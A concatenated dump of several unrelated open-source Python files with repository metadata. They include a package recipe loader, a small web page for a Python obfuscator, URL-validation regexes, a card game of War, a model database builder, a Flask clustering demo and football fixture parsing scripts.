] | null | null | null | hardhat/recipes/python/__init__.py | stangelandcl/hardhat | 1ad0c5dec16728c0243023acb9594f435ef18f9c | [
"MIT"
] | null | null | null | hardhat/recipes/python/__init__.py | stangelandcl/hardhat | 1ad0c5dec16728c0243023acb9594f435ef18f9c | [
"MIT"
] | null | null | null | import os
directory = os.path.dirname(__file__)
| 30.254237 | 79 | 0.547899 | import os
directory = os.path.dirname(__file__)
def load(settings):
    """Collect the python recipes in this package and build their
    dependency lists.

    Returns a (recipes, dependencies) tuple: ``recipes`` is the list of
    recipe classes, ``dependencies`` a list of lists whose first element
    is the versioned recipe name (e.g. 'python3-foo') followed by what
    it depends on.
    """
    from hardhat.util import load_recipes
    recipes = load_recipes(directory, 'hardhat.recipes.python')
    # Hand-maintained aliases and meta-packages.
    dependencies = [
        # only one version of cython is needed so alias it
        ['cython', 'python3-cython'],  # alias
        ['devpi', 'python3-devpi-client',
         'python3-devpi-server',
         'python3-devpi-web'],
        ['guess-renames', 'python2-guess-renames'],
        ['hg-git', 'python2-hg-git'],  # alias
        ['meld', 'python2-meld'],
        ['nuitka', 'python2-nuitka'],
        ['tortoisehg', 'python2-tortoisehg'],
    ]
    for recipe_cls in recipes:
        instance = recipe_cls(settings=settings)
        for python in instance.pythons:
            versioned_name = python + '-' + instance.name
            raw_depends = getattr(instance, 'depends', [])
            # Rewrite the generic 'python-' prefix to the concrete
            # interpreter version for this recipe ('python2-'/'python3-').
            depends = [
                python + dep[len('python'):] if dep.startswith('python-') else dep
                for dep in list(raw_depends)
            ]
            depends.insert(0, versioned_name)
            dependencies.append(depends)
    # Make sure each list that needs an interpreter also depends on it.
    for dep_list in dependencies:
        if needs_python(dep_list, 2):
            dep_list += ['python2']
        elif needs_python(dep_list, 3):
            dep_list += ['python3']
    return (recipes, dependencies)
def needs_python(depends, version):
    """Return True when *depends* references python<version>-prefixed
    packages without listing the interpreter itself."""
    interpreter = 'python%s' % version
    prefix = interpreter + '-'
    has_versioned_dep = any(d.startswith(prefix) for d in depends)
    lists_interpreter = interpreter in depends
    return has_versioned_dep and not lists_interpreter
| 1,688 | 0 | 46 |
2051c4639387560e84e8d243f881177997e1a1f1 | 1,069 | py | Python | obfuscatorPage.py | andrewrx83/python2 | e70b7e1db3af575b4a522063c1bb6584f1a9275d | [
"MIT"
] | 26 | 2015-10-17T11:30:35.000Z | 2021-03-22T07:46:36.000Z | obfuscatorPage.py | andrewrx83/python2 | e70b7e1db3af575b4a522063c1bb6584f1a9275d | [
"MIT"
] | 10 | 2015-05-10T22:51:35.000Z | 2017-09-15T10:00:33.000Z | obfuscatorPage.py | andrewrx83/python2 | e70b7e1db3af575b4a522063c1bb6584f1a9275d | [
"MIT"
] | 16 | 2015-08-16T07:13:37.000Z | 2021-12-09T12:08:56.000Z | import os, sys, cyclone.web
import pyobf
from twisted.python import log
from twisted.internet import reactor
if __name__ == "__main__":
log.startLogging(sys.stdout)
port = int(os.environ.get('PORT', 5000))
reactor.listenTCP(port, Application())
reactor.run()
| 28.891892 | 122 | 0.626754 | import os, sys, cyclone.web
import pyobf
from twisted.python import log
from twisted.internet import reactor
class IndexHandler(cyclone.web.RequestHandler):
    """Serves the obfuscator form and processes its submissions."""

    def get(self):
        # Fresh page: empty fields and zero lengths.
        self.render("index.html", original="", obfuscated="", originalLen=0, obfLen=0)

    def post(self):
        source = self.get_argument("original", None)
        obfuscated = pyobf.Obfuscator(source).build_simple()
        # Echo the input back alongside the result and both lengths.
        self.render(
            "index.html",
            original=source,
            obfuscated=obfuscated,
            originalLen=len(source),
            obfLen=len(obfuscated),
        )
class Application(cyclone.web.Application):
    """Cyclone application wiring the root route to the obfuscator page."""

    def __init__(self):
        routes = [
            (r"/", IndexHandler),
        ]
        options = {
            "debug": True,
            "static_path": "./static",
            "template_path": "./template",
        }
        cyclone.web.Application.__init__(self, routes, **options)
if __name__ == "__main__":
log.startLogging(sys.stdout)
port = int(os.environ.get('PORT', 5000))
reactor.listenTCP(port, Application())
reactor.run()
| 619 | 48 | 125 |
ceb1eeaa4872baf6c67cf9b0a43f35e96e62a66b | 1,569 | py | Python | babyshortener/utils/url.py | mnowotka/babyshortener | 079a95a715e0b30ca18265885d4d93a56553537a | [
"MIT"
] | 1 | 2019-09-20T07:36:15.000Z | 2019-09-20T07:36:15.000Z | babyshortener/utils/url.py | mnowotka/babyshortener | 079a95a715e0b30ca18265885d4d93a56553537a | [
"MIT"
] | 20 | 2018-10-05T09:00:23.000Z | 2022-03-31T01:53:32.000Z | babyshortener/utils/url.py | mnowotka/babyshortener | 079a95a715e0b30ca18265885d4d93a56553537a | [
"MIT"
] | null | null | null | """This file defines a URL validators based on Django ones.
"""
import re
# ----------------------------------------------------------------------------------------------------------------------
""" this regex is different from the one defined by Django because:
- in our case protocol is optional
- I decided that localhost is not a valid URL. This is a design decision that may be changed in future.
"""
url_regex = re.compile(
r'^((?:http|ftp)s?://)?' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
# ----------------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
""" When doing a redirect, we need a URL with a protocol and using regex seems to be a simplest way of doing that
"""
redirect_url_regex = re.compile(
r'^(?:http|ftp)s?://.*$', re.IGNORECASE)
# ----------------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
| 37.357143 | 120 | 0.361377 | """This file defines a URL validators based on Django ones.
"""
import re
# ----------------------------------------------------------------------------------------------------------------------
""" this regex is different from the one defined by Django because:
- in our case protocol is optional
- I decided that localhost is not a valid URL. This is a design decision that may be changed in future.
"""
url_regex = re.compile(
r'^((?:http|ftp)s?://)?' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
# ----------------------------------------------------------------------------------------------------------------------
def valid_url(url):
    """Return True when *url* matches the general URL pattern
    (protocol optional, localhost rejected)."""
    return url_regex.match(url) is not None
# ----------------------------------------------------------------------------------------------------------------------
""" When doing a redirect, we need a URL with a protocol and using regex seems to be a simplest way of doing that
"""
redirect_url_regex = re.compile(
r'^(?:http|ftp)s?://.*$', re.IGNORECASE)
# ----------------------------------------------------------------------------------------------------------------------
def valid_url_for_redirect(url):
    """Return True when *url* carries an explicit protocol, as required
    for issuing a redirect."""
    return redirect_url_regex.match(url) is not None
# ----------------------------------------------------------------------------------------------------------------------
| 94 | 0 | 46 |
444bde82d6fd488d23f00861a4f896b303889cbc | 7,111 | py | Python | war.py | Feldari/cardgame-war | 895082a81c78f7643b15c057909a2a4505d42d27 | [
"MIT"
] | null | null | null | war.py | Feldari/cardgame-war | 895082a81c78f7643b15c057909a2a4505d42d27 | [
"MIT"
] | null | null | null | war.py | Feldari/cardgame-war | 895082a81c78f7643b15c057909a2a4505d42d27 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3.6
import random
def init():
    '''
    Build the 52-card deck to draw from.

    Runs at the beginning of the program and should only be re-run to
    start a new game.  Each entry is a (label, strength) tuple, e.g.
    [('AH', 14), ('KH', 13), ('QH', 12), ...] where A=14, K=13, Q=12,
    J=11 and number cards use their printed value.
    '''
    cardfaces = ("A", "K", "Q", "J", "10", "9", "8", "7", "6", "5", "4", "3", "2")
    cardsuits = ("H", "S", "D", "C")
    # Strength of the face cards; replaces the original character-by-
    # character parsing loop with a direct lookup.
    face_strength = {"A": 14, "K": 13, "Q": 12, "J": 11}
    complete_deck = []
    for suit in cardsuits:
        for face in cardfaces:
            strength = face_strength[face] if face in face_strength else int(face)
            complete_deck.append((face + suit, strength))
    return complete_deck
def shuffle(mycards):
    '''
    Return a new list holding the cards of *mycards* in random order.

    NOTE: this empties *mycards* in place; fight() relies on that to
    move a player's loot pile back into their hand without duplicating
    cards.  Requires import random.
    '''
    shuffled = []
    # The original guarded random.choice with a pointless `pick == ''`
    # sentinel loop; choice() always returns an element, so just drain
    # the source list.
    while mycards:
        pick = random.choice(mycards)
        shuffled.append(pick)
        mycards.remove(pick)
    return shuffled
def startinghands(deck):
    '''
    Deal the deck alternately into two hands, one card at a time,
    mirroring a real deal.  Returns (hand0, hand1).
    '''
    # Even positions go to player 0, odd positions to player 1.
    even_cards = list(deck[0::2])
    odd_cards = list(deck[1::2])
    return (even_cards, odd_cards)
def print_hands(p1hand, p2hand):
    '''
    Print both players' current hands.

    Only each card's face value and suit are shown, never the converted
    numeric strength.
    '''
    for label, hand in (('Player 1', p1hand), ('Player 2', p2hand)):
        print('%s has' % label, len(hand), 'card(s): ')
        for card, _strength in hand:
            print(card, end=' ')
        print('\n')
def fight(hand1, hand2):
    '''
    Core game loop: repeatedly compare the players' top cards.

    Expects two lists of (label, strength) tuples, e.g.
    [('AH', 14), ('KH', 13), ...].  The winner of each comparison takes
    both cards into a loot pile; when a hand runs dry its loot pile is
    shuffled back in (shuffle() empties the pile in place, so no card is
    duplicated).  Prints the winner once a player has no cards left.
    '''
    player1loot = []
    player2loot = []
    while hand1 != [] and hand2 != []:
        while hand1 != [] and hand2 != []:
            print()
            print('Card pair: ')
            print('Player 1: ', hand1[0][0])
            print('Player 2: ', hand2[0][0])
            # BUG FIX: compare card *strengths* (index 1).  The original
            # compared the label strings / whole hand lists, so rounds
            # were decided lexicographically instead of by card value
            # (and ties could never occur with a single deck).
            if hand1[0][1] == hand2[0][1]:
                # TODO: resolve ties with war(); for now both cards are
                # simply discarded, matching the original behaviour.
                hand1.pop(0)
                hand2.pop(0)
            elif hand1[0][1] > hand2[0][1]:
                print('Player 1 wins hand')
                player1loot.append(hand1[0])
                player1loot.append(hand2[0])
                hand1.pop(0)
                hand2.pop(0)
            else:
                print('Player 2 wins hand')
                player2loot.append(hand1[0])
                player2loot.append(hand2[0])
                hand1.pop(0)
                hand2.pop(0)
        # A hand ran dry: shuffle that player's loot pile back in.
        if hand1 == []:
            print('Shuffling player 1\'s hand')
            hand1 = shuffle(player1loot)
        if hand2 == []:
            print('Shuffling player 2\'s hand')
            hand2 = shuffle(player2loot)
        # Still empty after reshuffling means no cards anywhere: game over.
        if hand1 == []:
            print('Player 2 Wins!!')
        if hand2 == []:
            print('Player 1 Wins!!')
def war(hand1, hand2, player1loot, player2loot):
    '''
    If two cards match, this resolves the tie by showing the contested
    cards and the next three cards each player puts on the line.

    NOTE(review): this function is unfinished — it only prints the
    stakes; the loot lists are accepted but never awarded to a winner,
    and hands shorter than three cards will raise IndexError.
    '''
    print ('WAR!!!')
    print ('P1 card: ', hand1[0][0], 'P2 card: ', hand2[0][0])
    print ('Cards on the line: ')
    print ('   P1    P2')
    for card in range(3):
        print ('   ', hand1[card][0], hand2[card][0])  # BUG FIX: missing ')'
if __name__ == '__main__':
    # These lines start the game and initialize the deck and player's hands.
    cards = init()
    cards = shuffle(cards)
    cards = startinghands(cards)
    p1hand = cards[0]
    p2hand = cards[1]
    # ######################################################################
    # This will print the players starting hands.
    print_hands(p1hand, p2hand)
    # Play rounds until one player holds every card (or the game empties).
    fight(p1hand, p2hand)
| 30.650862 | 78 | 0.50682 | #!/usr/bin/env python3.6
import random
def init():
'''
This builds the deck to draw from.
This runs at the beginning of the program then shoud only be run
to start a new game.
'''
# These are the possible face values and suits for the cards.
cardfaces = ("A","K","Q","J","10","9","8","7","6","5","4","3","2")
cardsuits = ("H","S","D","C")
# This section builds the cards with their assigned suits
# ex. thisdeck = [AH, KH, QH, ...]
thisdeck = []
complete_deck = []
for suit in cardsuits:
for face in cardfaces:
thisdeck.append(face+suit)
# This section takes the completed deck and assigns each card to a tuple
# This tuple has the generated card value and suit at complete_deck[*]
# The card's numeric stregnth is stored in complete_deck[*][*]
# A = 14, K = 13, Q = 12, J = 11
# ex. complete_deck = [(AH, 14), (KH, 13), (QH, 12), ... ]
for card in thisdeck:
card_value = ''
for value in card:
if value == 'D' or value == 'S' or value == 'C' or value == 'H':
break
elif value == 'A' or value == 'K' or value == 'Q' or value == 'J':
if value == 'A':
card_value = 14
elif value == 'K':
card_value = 13
elif value == 'Q':
card_value = 12
else:
card_value = 11
else:
card_value = card_value + str(value)
complete_deck.append((card, int(card_value)))
return complete_deck
def shuffle(mycards):
'''
This takes the input list and shuffles it.
In war.py it is used to shuffle decks of cards stord in lists.
Requires import random.
'''
unshuffled = mycards
shuffled = []
for count in range (0,len(unshuffled)):
pick = ''
while (pick == ''):
pick = random.choice(unshuffled)
shuffled.append(pick)
unshuffled.remove(pick)
return shuffled
def startinghands(deck):
'''
This function divides the availible cards to the two players.
'''
hand0 = []
hand1 = []
count = 0
for deal in range(0,len(deck)):
# Switch the target player when dealing each card.
# This reflects a real card deal.
if count % 2 == 0:
hand0.append(deck[deal])
else:
hand1.append(deck[deal])
# instead of .append() I may want to use insert to place new cards at
# the front of the list. This would reflect a real deal even closer.
count += 1
return (hand0, hand1)
def print_hands(p1hand, p2hand):
'''
This prints the current hands for the players.
It only prints the face value and suit.
It does not print the converted value for the card.
'''
print ('Player 1 has', len(p1hand), 'card(s): ')
for card_pair in p1hand:
print (card_pair[0], end=' ')
print('\n')
print ('Player 2 has', len(p2hand), 'card(s): ')
for card_pair in p2hand:
print (card_pair[0], end=' ')
print('\n')
def fight(hand1, hand2):
'''
This function is the core for comparing the cards
The function expects 2 lists of tuples containing the players hands.
example input: [(AH, 14), (KH, 13), (QH, 12), ... ]
'''
card1 = ''
card2 = ''
player1loot = []
player2loot = []
while hand1 != [] and hand2 != []:
while hand1 != [] and hand2 != []:
print ()
print ('Card pair: ')
print ('Player 1: ', hand1[0][0])
print ('Player 2: ', hand2[0][0])
# #################################
# #######TO DO#####################
if hand1[0][0] == hand2[0][0]:
# war(hand1, hand2, player1loot, player2loot)
hand1.pop(0)
hand2.pop(0)
# #####COMPLETE WAR FUNCTION ABOVE#
# #################################
elif hand1 > hand2:
print ('Player 1 wins hand')
player1loot.append(hand1[0])
player1loot.append(hand2[0])
hand1.pop(0)
hand2.pop(0)
else:
print ('Player 2 wins hand')
player2loot.append(hand1[0])
player2loot.append(hand2[0])
hand1.pop(0)
hand2.pop(0)
'''
# uncomment below lines to see how cards move during shuffling process
# see below comment block too!
print ('-------------------Before Shuffle-------------------')
print ('\#cards', len(hand1), 'hand1', hand1)
print ('\#cards', len(hand2), 'hand2', hand2)
print ()
print ('\#cards', len(player1loot), 'p1loot', player1loot)
print ('\#cards', len(player2loot), 'p2loot', player2loot)
print ()
# uncomment above lines to see how cards move during shuffling process
'''
# ??????Why does this blank the list used for the argument???
if hand1 == []:
print('Shuffling player 1\'s hand')
hand1 = shuffle(player1loot)
else:
pass
if hand2 == []:
print('Shuffling player 2\'s hand')
hand2 = shuffle(player2loot)
else:
pass
'''
# uncomment below lines to see how cards move during shuffling process
# see above comment block too!
print ('-------------------After Shuffle--------------------')
print ('\#cards', len(hand1), 'hand1', hand1)
print ('\#cards', len(hand2), 'hand2', hand2)
print ()
print ('\#cards', len(player1loot), 'p1loot', player1loot)
print ('\#cards', len(player2loot), 'p2loot', player2loot)
print ()
# uncomment above lines to see how cards move during shuffling process
'''
# check to see if player hand is still empty after shuffle
# if it is other player wins!!
if hand1 == []:
print ('Player 2 Wins!!')
else:
pass
if hand2 == []:
print ('Player 1 Wins!!')
else:
pass
def war(hand1, hand2, player1loot, player2loot):
'''
If two cards match in the war function this one resolves the tie.
'''
print ('WAR!!!')
print ('P1 card: ', hand1[0][0], 'P2 card: ', hand2[0][0])
print ('Cards on the line: ')
print (' P1 P2')
for card in range(3):
print (' ', hand1[card][0], hand2[card][0]
if __name__ == '__main__':
# These lines start the game and initialize the deck and player's hands.
cards = init()
cards = shuffle(cards)
cards = startinghands(cards)
p1hand = cards[0]
p2hand = cards[1]
# ######################################################################
# This will print the players starting hands.
print_hands(p1hand, p2hand)
fight(p1hand, p2hand)
| 0 | 0 | 0 |
0221ddaeac067a10aac025cefb09e848688bdbb3 | 3,467 | py | Python | wearebeautiful/database.py | wearebeautiful/wearebeautiful.info | ba93138f94079b89d7f9d89328509e201837bd07 | [
"CC0-1.0"
] | 1 | 2019-07-20T10:17:14.000Z | 2019-07-20T10:17:14.000Z | wearebeautiful/database.py | wearebeautiful/wearebeautiful-tools | ba93138f94079b89d7f9d89328509e201837bd07 | [
"CC0-1.0"
] | 26 | 2020-02-17T17:42:49.000Z | 2020-04-17T21:24:52.000Z | wearebeautiful/database.py | wearebeautiful/wearebeautiful-tools | ba93138f94079b89d7f9d89328509e201837bd07 | [
"CC0-1.0"
] | 1 | 2019-08-14T19:23:33.000Z | 2019-08-14T19:23:33.000Z | import os
import json
import shutil
from peewee import SqliteDatabase
from wearebeautiful.db_model import DBModel, db, create_from_manifest
from wearebeautiful.manifest import validate_manifest
import config
DB_FILE = "wab-models.db"
MIN_SURFACE_MED_SIZE = 8 * 1024 * 1024
MAX_SURFACE_MED_SIZE = 12 * 1024 * 1024
MIN_SURFACE_LOW_SIZE = 1.5 * 1024 * 1024
MAX_SURFACE_LOW_SIZE = 5 * 1024 * 1024
| 36.494737 | 160 | 0.590424 | import os
import json
import shutil
from peewee import SqliteDatabase
from wearebeautiful.db_model import DBModel, db, create_from_manifest
from wearebeautiful.manifest import validate_manifest
import config
DB_FILE = "wab-models.db"
MIN_SURFACE_MED_SIZE = 8 * 1024 * 1024
MAX_SURFACE_MED_SIZE = 12 * 1024 * 1024
MIN_SURFACE_LOW_SIZE = 1.5 * 1024 * 1024
MAX_SURFACE_LOW_SIZE = 5 * 1024 * 1024
def add_models(dir):
for item in os.listdir(dir):
if item.endswith(".json"):
with(open(os.path.join(dir, item), "rb")) as m:
try:
manifest = json.loads(str(m.read().decode('utf-8')))
except json.decoder.JSONDecodeError as err:
print(" skipping %s: %s" % (item, str(err)))
continue
except IOError as err:
print(" skipping %s: %s" % (item, str(err)))
continue
err = validate_manifest(manifest)
if err:
print(" manifest not valid, skipping: %s" % err)
continue
model = create_from_manifest(manifest)
print(" add %s-%s-%d " % (model.model_id, model.code, model.version), end = '')
model.save()
surface_med = os.path.join(config.MODEL_DIR, model.model_id, model.code, "%s-%s-%d-surface-med.stl" % (model.model_id, model.code, model.version))
surface_med_size = os.path.getsize(surface_med)
if surface_med_size > MAX_SURFACE_MED_SIZE:
med_size_warn = '+'
elif surface_med_size < MIN_SURFACE_MED_SIZE:
med_size_warn = '-'
else:
med_size_warn = ' '
surface_low = os.path.join(config.MODEL_DIR, model.model_id, model.code, "%s-%s-%d-surface-low.stl" % (model.model_id, model.code, model.version))
surface_low_size = os.path.getsize(surface_low)
if surface_low_size > MAX_SURFACE_LOW_SIZE:
low_size_warn = '+'
elif surface_low_size < MIN_SURFACE_LOW_SIZE:
low_size_warn = '-'
else:
low_size_warn = ' '
print(" med: %5.2f MB %s " % (surface_med_size / 1024.0 / 1024.0, med_size_warn), end = '')
print(" low: %5.2f MB %s " % (surface_low_size / 1024.0 / 1024.0, low_size_warn), end = '')
screenshot = os.path.join(config.MODEL_GIT_DIR, model.model_id, model.code, "%s-%s-%d-screenshot.jpg" % (model.model_id, model.code, model.version))
if not os.path.exists(screenshot):
print(" (warning: %s is missing)" % screenshot)
else:
print()
def add_human_model(dir):
for item in os.listdir(dir):
dir_name = os.path.join(dir, item)
if len(item) == 4 and not item.isdigit():
add_models(dir_name)
def create_database():
db_file = os.path.join(config.MODEL_GIT_DIR, DB_FILE)
print("creating db file '%s'" % db_file)
try:
os.unlink(db_file)
except OSError:
pass
db.init(db_file)
db.create_tables([DBModel])
for item in os.listdir(config.MODEL_DIR):
dir_name = os.path.join(config.MODEL_DIR, item)
if len(item) == 6 and item.isdigit() and os.path.isdir(dir_name):
add_human_model(dir_name)
db_file_non_git = os.path.join(config.MODEL_DIR, DB_FILE)
shutil.copyfile(db_file, db_file_non_git)
| 2,997 | 0 | 69 |
d87d8fc47074e1ce777b15fdf6a6fb91c0181af1 | 733 | py | Python | stephen/week2.py | kanglicheng/learn-python-2020 | e5b2f0945f123763595bff825af59855d616a100 | [
"Unlicense"
] | null | null | null | stephen/week2.py | kanglicheng/learn-python-2020 | e5b2f0945f123763595bff825af59855d616a100 | [
"Unlicense"
] | null | null | null | stephen/week2.py | kanglicheng/learn-python-2020 | e5b2f0945f123763595bff825af59855d616a100 | [
"Unlicense"
] | null | null | null |
# print(pig_latin("Python"))
# print(pig_latin("computer"))
# print(pig_latin(("air")))
# print(ubbi_dubbi())
get_running_avg()
def pig_latin(word):
    """Translate *word* into pig latin; returns None for empty input."""
    if not word:
        return None
    if word[0] in "aeiou":
        # Vowel-initial words just take the "way" suffix.
        return word + "way"
    # Consonant-initial words rotate the first letter to the end, plus "ay".
    return "{}{}ay".format(word[1:], word[0])
# print(pig_latin("Python"))
# print(pig_latin("computer"))
# print(pig_latin(("air")))
def ubbi_dubbi():
    """Prompt for a word and return its ubbi-dubbi translation:
    "ub" is inserted before every vowel."""
    word = input("please enter a word: ")
    pieces = []
    for ch in word:
        if ch in "aeiou":
            pieces.append("ub")
        pieces.append(ch)
    return "".join(pieces)
# print(ubbi_dubbi())
def get_running_avg():
    """Read a space-separated list of integers from stdin and print it.

    NOTE(review): despite the name, no running average is computed —
    the parsed list is only echoed back; presumably the averaging step
    is still TODO.
    """
    numbers = input("enter the numbers: ")
    numbers = numbers.split(" ")
    array = [int(n) for n in numbers]
    print(array)
get_running_avg()
| 529 | 0 | 68 |
d4423723c5ded922dbd098a0b6a015236bed2606 | 2,490 | py | Python | app.py | behrad-kzm/LocationBrain | 44ef5e03cc9b240bfabad5c3c14635ef812a39ae | [
"MIT"
] | null | null | null | app.py | behrad-kzm/LocationBrain | 44ef5e03cc9b240bfabad5c3c14635ef812a39ae | [
"MIT"
] | null | null | null | app.py | behrad-kzm/LocationBrain | 44ef5e03cc9b240bfabad5c3c14635ef812a39ae | [
"MIT"
] | null | null | null | from flask import Flask
app = Flask(__name__)
@app.route('/')
if __name__ == '__main__':
app.run()
| 31.923077 | 76 | 0.542972 | from flask import Flask
app = Flask(__name__)
@app.route('/')
def hello_world():
    """Flask view for '/': runs a scikit-learn agglomerative-clustering
    demo on the digits dataset (plotting each linkage) and then returns
    a plain greeting string.

    NOTE(review): this does heavy CPU work and opens matplotlib windows
    on every request; plt.show() blocks until the windows are closed.
    """
    print(__doc__)  # module docstring (None unless the module defines one)
    from time import time
    import numpy as np
    from scipy import ndimage
    from matplotlib import pyplot as plt
    from sklearn import manifold, datasets
    # Load the 8x8 digit images as flat 64-feature vectors.
    X, y = datasets.load_digits(return_X_y=True)
    n_samples, n_features = X.shape
    np.random.seed(0)  # deterministic shifts/embedding across requests
    def nudge_images(X, y):
        # Having a larger dataset shows more clearly the behavior of the
        # methods, but we multiply the size of the dataset only by 2, as the
        # cost of the hierarchical clustering methods are strongly
        # super-linear in n_samples
        shift = lambda x: ndimage.shift(x.reshape((8, 8)),
                                        .3 * np.random.normal(size=2),
                                        mode='constant',
                                        ).ravel()
        X = np.concatenate([X, np.apply_along_axis(shift, 1, X)])
        Y = np.concatenate([y, y], axis=0)
        return X, Y
    X, y = nudge_images(X, y)
    # ----------------------------------------------------------------------
    # Visualize the clustering
    def plot_clustering(X_red, labels, title=None):
        # Rescale the 2-D embedding to the unit square before drawing.
        x_min, x_max = np.min(X_red, axis=0), np.max(X_red, axis=0)
        X_red = (X_red - x_min) / (x_max - x_min)
        plt.figure(figsize=(6, 4))
        for i in range(X_red.shape[0]):
            plt.text(X_red[i, 0], X_red[i, 1], str(y[i]),
                     color=plt.cm.nipy_spectral(labels[i] / 10.),
                     fontdict={'weight': 'bold', 'size': 9})
        plt.xticks([])
        plt.yticks([])
        if title is not None:
            plt.title(title, size=17)
        plt.axis('off')
        plt.tight_layout(rect=[0, 0.03, 1, 0.95])
    # ----------------------------------------------------------------------
    # 2D embedding of the digits dataset
    print("Computing embedding")
    X_red = manifold.SpectralEmbedding(n_components=2).fit_transform(X)
    print("Done.")
    from sklearn.cluster import AgglomerativeClustering
    # Time and plot each of the four linkage strategies on the embedding.
    for linkage in ('ward', 'average', 'complete', 'single'):
        clustering = AgglomerativeClustering(linkage=linkage, n_clusters=10)
        t0 = time()
        clustering.fit(X_red)
        print("%s :\t%.2fs" % (linkage, time() - t0))
        plot_clustering(X_red, clustering.labels_, "%s linkage" % linkage)
    plt.show()  # blocks the request until all figure windows are closed
    return 'Hello World!'
if __name__ == '__main__':
app.run()
| 2,360 | 0 | 22 |
23a910acf49e30a5a8a9310c45d430a0c2df692a | 130 | py | Python | gastrotourism/accounts/admin.py | fallprojects/gastrotourism | 79dc3fbeda9b9d2175fca6590369b003d7a10c36 | [
"MIT"
] | null | null | null | gastrotourism/accounts/admin.py | fallprojects/gastrotourism | 79dc3fbeda9b9d2175fca6590369b003d7a10c36 | [
"MIT"
] | null | null | null | gastrotourism/accounts/admin.py | fallprojects/gastrotourism | 79dc3fbeda9b9d2175fca6590369b003d7a10c36 | [
"MIT"
] | null | null | null | from django.contrib import admin
# Register your models here.
from accounts.models import Customer
admin.site.register(Customer) | 21.666667 | 36 | 0.823077 | from django.contrib import admin
# Register your models here.
from accounts.models import Customer
admin.site.register(Customer) | 0 | 0 | 0 |
aeb22914ed6e50a3574958d1d84e46aeb1996420 | 3,596 | py | Python | stuff.py | karol-prz/predictor | 2774fe2a88a9bf5f7aa58f884cdcf879182c64c7 | [
"MIT"
] | null | null | null | stuff.py | karol-prz/predictor | 2774fe2a88a9bf5f7aa58f884cdcf879182c64c7 | [
"MIT"
] | null | null | null | stuff.py | karol-prz/predictor | 2774fe2a88a9bf5f7aa58f884cdcf879182c64c7 | [
"MIT"
] | null | null | null |
'''
def compare(file1, file2):
f1 = open(file1, 'r')
f2 = open(file2, 'r')
right_counter = 0
wrong_lines = []
for i in range(50):
r1 = f1.readline()
r2 = f2.readline()
r1 = r1.strip('\n')
r2 = r2.strip('\n')
if r1[-1:] == r2[-1:]:
right_counter += 1
else:
wrong_lines.append(i)
print('Wrong lines are: %s\nAmount of wrongs is %i\n\nAmount of rights is %i\nWell Done!' % (str(wrong_lines), len(wrong_lines), right_counter))'''
compare('actual_brazil_2014.csv', 'predicted_brazil_5')
| 21.793939 | 148 | 0.630423 |
def get_team_names(details):
    """Append every distinct team name found in *details* to team_names.txt.

    Each entry in *details* is a fixture dict with 'home-team' and
    'away-team' keys. Names are written newline-separated in first-seen
    order, with no trailing newline.

    Bug fix: the parameter was previously misspelled ``deatils`` while the
    body iterated ``details``, raising NameError on every call.
    """
    teams = []
    for game in details:
        for side in ('home-team', 'away-team'):
            if game[side] not in teams:
                teams.append(game[side])
    # 'a+' keeps any pre-existing content and appends the new names.
    with open('team_names.txt', 'a+') as outfile:
        outfile.write('\n'.join(teams))
def sort_team_names():
    """Rewrite team_names.txt with its lines in sorted order.

    Every line (including any empty ones produced by blank entries) is
    written back followed by a newline.
    """
    with open('team_names.txt', 'r') as infile:
        names = infile.read().split('\n')
    with open('team_names.txt', 'w') as outfile:
        for name in sorted(names):
            outfile.write(name + '\n')
def parse_fixtures():
    """Parse fixtures_russia_2018.csv into a list of fixture dicts.

    The header row is skipped; for each data row only the game label,
    date-time, stage and the two team columns are kept.
    """
    fixtures = []
    with open('fixtures_russia_2018.csv', 'r') as csv_file:
        csv_file.readline()  # discard the header row
        for raw_line in csv_file:
            fields = raw_line.strip('\n').split(',')
            fixtures.append({
                'game': fields[1],
                'date-time': fields[2],
                'stage': fields[3],
                'home-team': fields[6],
                'away-team': fields[7]
            })
    return fixtures
def organize_matches():
    """Convert data/results.csv rows (1985-01-01 onward) into a list of
    header->value dicts and dump them to data/matches via write_json.
    """
    file = open('data/results.csv', 'r')
    r = file.readline()  # header row: column names
    r = r.strip('\n')
    r = r.split(',')
    matches = []
    for stat in file:
        stat = stat.strip('\n')
        infos = stat.split(',')
        # ISO dates compare correctly as plain strings; skip pre-1985 rows.
        if infos[0] < "1985-01-01": continue
        k = {}
        for i, j in enumerate(r):
            k[j] = infos[i]
        matches.append(k)
    # NOTE(review): the file handle is never closed explicitly.
    from parsers.utils import write_json
    write_json('data/matches', matches)
def get_wc_matches():
    """Filter data/matches down to FIFA World Cup games played in
    tournament years (1990, 1994, ..., 2018) and write the trimmed
    records to data/wc_matches.
    """
    from parsers import utils
    matches = utils.read_json('data/matches')
    wc_matches = []
    for match in matches:
        year = match['date'].split('-')[0]
        # Keep only World Cup years: every 4th year from 1990 through 2018.
        if year not in [str(x) for x in range(1990, 2019, 4)]: continue
        if match['tournament'] != 'FIFA World Cup': continue
        match_info = {
            'year': year,
            'home_score': match['home_score'],
            'away_score': match['away_score'],
            'home_team': match['home_team'],
            # NOTE(review): dash key is inconsistent with 'home_team' —
            # looks like a typo, but downstream readers may rely on it; confirm.
            'away-team': match['away_team'],
            'date': match['date'],
            'country': match['country']
        }
        wc_matches.append(match_info)
    utils.write_json('data/wc_matches', wc_matches)
def get_alternate_names():
    """Interactively collect {latter_name: former_name} team-name aliases
    from stdin and save them to data/alternate_names.

    Typing 'no' at the inner prompt finishes the current former name;
    typing 'no' at the outer prompt finishes the whole session.
    """
    alternate_names = {}
    while True:
        former = input('Enter former name here: \n-> ')
        if former == 'no': break
        while True:
            # Several current names may map back to the same former name.
            latter = input('Enter a latter name here: \n-> ')
            if latter == 'no': break
            alternate_names[latter] = former
    from parsers.utils import write_json
